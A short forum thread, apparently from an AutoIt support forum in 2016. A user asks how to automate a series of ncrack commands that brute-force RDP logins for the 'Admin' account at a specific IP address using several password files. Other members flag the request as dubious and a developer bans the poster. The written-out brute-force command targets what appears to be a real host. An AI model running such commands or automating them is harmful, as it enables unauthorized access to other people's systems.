claudius Posted May 21, 2016 Posted May 21, 2016 How to run (OS wINDOWS -cmd.exe) multiple commands one after another, i use ncrack, commands I open manually cmd.exe and i paste this code: ncrack --user Admin -P pass1.txt 12.2.182.201:3389 -oN good.txt -f When pass1.txt is finished i paste manually to cmd.exe the second command,wich contains the Pass2.txt etc...: ncrack --user Admin -P pass1.txt 12.2.182.201:3389 -oN good.txt -f then i paste manually to cmd , Pass.3txt ncrack --user Admin -P pass3.txt 12.2.182.201:3389 -oN good.txt -f How can i run all commands automatically ?in a batch file ?
Somerset Posted May 21, 2016 Posted May 21, 2016 Spam reported, and possibly other dubious activities this person is requesting.
Developers Jos Posted May 21, 2016 Developers Posted May 21, 2016 Ok ...so lets deal with you now. As stated already: It seems you are a little impatient bugger coming here to ask support for dubious activities, so given you already have made me loose my patience with you, consider yourself banned. Jos SciTE4AutoIt3 Full installer Download page - Beta files Read before posting How to post scriptsource Forum etiquette Forum Rules Live for the present, Dream of the future, Learn from the past.
Recommended Posts